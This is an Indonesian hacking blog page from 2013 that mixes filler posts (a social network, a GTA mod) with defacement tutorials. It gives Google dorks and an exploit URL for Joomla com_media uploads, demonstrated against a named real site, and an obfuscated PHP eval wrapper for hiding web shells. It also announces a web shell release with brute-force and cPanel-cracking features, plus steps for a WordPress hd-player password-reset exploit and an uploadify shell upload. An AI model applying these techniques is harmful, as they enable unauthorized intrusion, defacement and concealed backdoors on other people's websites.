This is featured post 1 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.

This is featured post 2 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.

This is featured post 3 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.

This is featured post 4 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.

Rabu, 22 Mei 2013

AnonySocial, Jejaring Sosial Para Anonymous

Posted by Erza Jullian 02.46, under ,, | No comments

Lagi buka Facebook, eh ternyata pada rame bahas AnonySocial. Ya, AnonySocial adalah situs jejaring baru. Fiturnya memang tidak jauh berbeda dari Facebook. Ada fitur membuat halaman, fitur chat, like status dan lain-lain. Bahasa defaultnya adalah bahasa Brazil [Portugis], kemungkinan dibuat oleh orang Brazil. Brazil kan sarangnya Anonymous. Hehehe.

Tapi saya sendiri belum tahu siapa pembuat situs jejaring sosial tersebut. Maybe, keep anonymous. :3

Oke, ini screenshootnya :





Yang ingin mendaftar, silahkan menuju link berikut :

http://anonysocial.com/



Saat pertama kali diakses, bahasa situsnya adalah Bahasa Brazil. Namun anda bisa mengubahnya ke bahasa Amerika [Inggris]. Letak ganti bahasa ada di pojok kiri bawah.

Add akun saya ya bro :

Yuyud HNc



Sekian dan terimakasih.

Selasa, 21 Mei 2013

Teknik Exploit Joomla | com_media

Posted by Erza Jullian 02.07, under | No comments

Assalamualaikum....


Berhubung udah banyak banget yang share, jadi saya juga ga mau ketinggalan,, hehehe Nah, topic kali ini membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla.. :) pada penasaran gimana caranya? so easy kok :)

Dork : inurl:com_media site:com


Exploit: /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Pertama sobat cari dah targetnya dulu di google dengan memanfaatkan dork diatas, dan kalo bisa dork tersebut dikembangkan lagi yah, biar bisa nemu target yang fresh :)


Disini saya sudah menemukan tergetnya : http://www.rivit.ca

Nah, sekarang kita  tambahin aja exploitnya, jadinya begini:

http://www.rivit.ca/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

 maka akan terlihat seperti gambar berikut:



Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian uploader..


Note: file yang bisa diupload berextensi .txt .jpg .gif .png. Untuk html dan php tidak bisa. 

kalo berhasil, akan muncul keterangan seperti berikut:


Nah, untuk melihat hasil file yang sudah kita upload di sini: site.com/images/file
cth: http://www.rivit.ca/images/idca.txt
lihat hasil file yang sudah saya upload tadi :) tinggal Submit aja di deface archiver :p


Sip, segitu aja artikel yang bisa berikan kali ini, mudah2an bermanfaat :)

Content Creator: Onix AQua


Senin, 20 Mei 2013

[Tutorial] Cara Mudah Encode Shell Backdoor

Posted by Erza Jullian 13.34, under , | No comments

Kali ini saya akan share tutorial encode shell php. Ya, shell yang diencode memiliki banyak keunggulan. Selain kita menyembunyikan source asli dari shell tersebut, kita juga memperkecil ukuran dari shell.

Sekedar info, saya mendapatkan tutorial ini dari bang x'1n73ct . Dan di juga sudah mengijinkan jika tutorial ini disebarluaskan. :)

Oke langsung saja.



Bahan :

Shell mentah

Tools Encode - klik Disini



Pertama-tama, siapkan shell yang akan di encode. Copy semua script dari atas sampai bawah. :)

Lalu buka tools encode, pastekan scriptnya di kolom atas. Pilih jalur encodenya, sebagai contoh, saya pilih jalur : bsae64 � gzinflate � str_rot13 �convert_uu � gzinflate � base64 . Lalu klik menu encode.

Lihat SS :





Lalu hasil encode nantinya akan terlihat di kolom bawah.



Setelah itu, buka text editor [saya menggunakan notepad++], lalu copy script berikut :



<?php

@ini_set('output_buffering',0); 

@ini_set('display_errors', 0);



$convert = � [shell yang diencode]  �;



@eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($convert))))));



?>



Untuk [shell yang diencode], silahkan diisi dengan script hasil convert dari tools encode tadi.

Lalu tulisan yang saya beri warna biru, itu silahkan diisi sesuaid engan jalur encode yang dipilih.



Saya akan sedikit nejelaskan masing-masing fungsi script tersebut :



@ini_set('output_buffering',0); 

Perintah ini berfungsi untuk meminimalkan buffering yang ada di file



@ini_set('display_errors', 0);

Perintah ini berfungsi untuk menghilangkan error pada file







Dan setelah semua selesai, simpan dengan format .php . Contoh : shell.php

Coba test di localhost dan insya allah berhasil.

Shell JKT48 HACKER pun saya rilis setelah membaca tutorial ini.



Jika tutorial saya masih kurang, sobat bisa membaca tutorial dari bang x'1n73ct . Filenya berbentuk doc [dokumen].

Klik Disini Untuk Download



Di dalam file tersebut sudah ada tutorial encode shell dan juga tools encode yang bisa dijalankan di localhost.



Sekian tutorial dari saya. Semoga bermanfaat.

Special thanks to x'1n73ct



Yang mau copas harap kasih sumber ya. :)

Sabtu, 18 Mei 2013

[Release] Nabilaholic Privat Shell - JKT48 WebShell

Posted by Erza Jullian 16.15, under , | No comments

Sebenarnya shell ini sudah jadi sekitar tig minggu yang lalu. Namun karena masalah belum bisa encode shell, shellnya belum dirilis. Ukuran awal [belum di encode] mencapai 240kb. Namun alhamdulillah kemarin setelah membaca tutorial dari om x'1n73ct akhirnya bisa encode sendiri. Shell ini saya recode ulang dari b374k m1n1. Namun karena saya sendiri masih dalam tahap belajar coding php, fiturnya saya adopsi dari shell 1n73ction.

Ini penampakan shellnya :




JKT48 WebShell

Ini beberapa fiturnya :

E-Mail

Symlink

Config

WP BruteForce

Cpanel Cracker

Password Hash

SQLi Scanner

Zone-H Submit



Dan masih banyak lagi. Silahkan lihat sendiri screenshoot berikut :





Untuk download, ini linknya :

DOWNLOAD JKT48 WebShell



Description :

Name : Nabilaholic Privat Shell [ 1n73ction Recode by Nabilaholic404 ]

Size : 85kb

Default password : jkt48 [you can change it by MD5 encrypt password]



Sekian dan semoga bermanfaat.



Thanks to x'1n73ct buat sourcecode Shell 1n73ctionnya dan tutorial encodenya. :)

Jumat, 17 Mei 2013

Cara Deface Dengan Reset Password | Wordpress Hd-player 0day Exploit

Posted by Erza Jullian 19.25, under | No comments


Assalamualaikum,,

Kemaren saya buka facebook, terus ada liat status dari Fanspage Algerian Cyber Army begini : "wordpress hd-player 0day Exploit http://1337day.net/exploit/20783" . Nah langsung saya menuju ke TKP lalu saya coba dan ternyata di beberapa web CMS wordpress masih ada yang bisa dengan menggunakan teknik ini, cukup sederhana aja kok caranya :D lihat yaaaaaa :D
Dork: inurl:"/wp-content/plugins/ripe-hd-player
 Pertama tentunya mencari target dengan dork, setelah keliling muter2 dapet deh ane target web nya :D

Kemudian saya jalankan script perlnya, :) lihat aja gambar berikut merupakan bagaimana cara menjalankan exploitnya :)


Lalu tinggal masukkan targetnya aja dengan cara : perl wp.pl site.com / 

Note : Jangan gunakan (http://) dan tambahkan spasi antara link dan garis miring seperti contoh usage1 dan usage2


Nah, kalo passwordnya sudah berhasil di reset :) tinggal loggin dah :)


Taraa,, jika berhasil pasti bisa masuk ke panel admin :) tinggal Tanem shell aja :)


Begitulah prosesnya :) mudah2an pada ngerti dah, kalo ada yg mau ditanyakan silahkan kunjungi Fanspagenya langsung Disini :p jangan tanya ke saya, karena saya cuma blogger yg cuma bisa nulis aja :(

Thanks :)

Content Creator : Onix AQua

NGR 500 to JKT48 Motor | GTA SA Mods

Posted by Erza Jullian 11.01, under , | No comments

Sampai bingung mau dikasih judul postingan apa. Jadi ya maaf kalau kurang tepat. Kali ini saya akan share Mod GTA San Andreas yaitu Motor JKT48 yang di modif dari Motor NGR500. Saya dapet baru beberapa hari yang lalu. Ini Screenshootnya :



Tertarik ? Pasti dong. :p

Nih link downloadnya

DOWNLOAD NGR500 JKT48 for GTA SAN ANDREAS

Password RAR : maduracyber

Tutorial installnya ada di dalam.

Sekedar saran, kalo males nyari manual, mending pake vehicles spawner. Cari aja di google. Soalnya ni motor kalo gak dipanggil pake cheat agak susah nemunya.



Download Motor GTA San Andreas JKT48 - Download Lengkap Modifikasi GTA SA JKT48

Rabu, 15 Mei 2013

Cara Deface Dengan Remote Shell Upload Vulnerability [uploadify] | Windows

Posted by Erza Jullian 20.49, under | No comments

Assalamualaikum..

Menanggapi permintaan mengenai masalah tutorial saya sebelumnya tentang Cara Deface Dengan Remote Shell Upload Vulnerability | Backtrack yang saya lakukan melalui system operasi Backtrack, dan atas permintaan sobat2 semua, sekarang saya akan menguraikan bagaimana menggunakannya di OS Windows :)


Bahan - Bahan :

1. Script Uploadify.php | Download Password: http://indocyberarmy.blogspot.com

2. Xampp | Download

3. Curl | Download

4. Live Target : Lihat1 & Lihat2

Langkah2 :

Dork: inurl:/js/uploadify/

Pertama sobat Install Xampp nya, lalu kalo udah selesai, extrack file Curl, script uploadify.php, Shell.php dan letakkan di C:\xampp\php

Jangan lupa edit dulu Uploadify.php dengan Notepad, silahkan dirubah yg ane kasi tandah seperti Link target, nama file dan folder! Lalu Save kembali..


Selanjutnya buka Xampp, lalu klik Start Apache


Setelah itu buka Terminal, lalu masuk ke directories C:\xampp\php>
Lalu ketik perintah php uploadify.php dan tunggu aja hasilnya :)

Nah, tinggal di eksekusi dah shellnya :)


Udah giitu aja, moga bermanfaat :) jangan lupa komentarnya :)

Content Creator : Onix AQua



Tags

Blog Archive

Blog Archive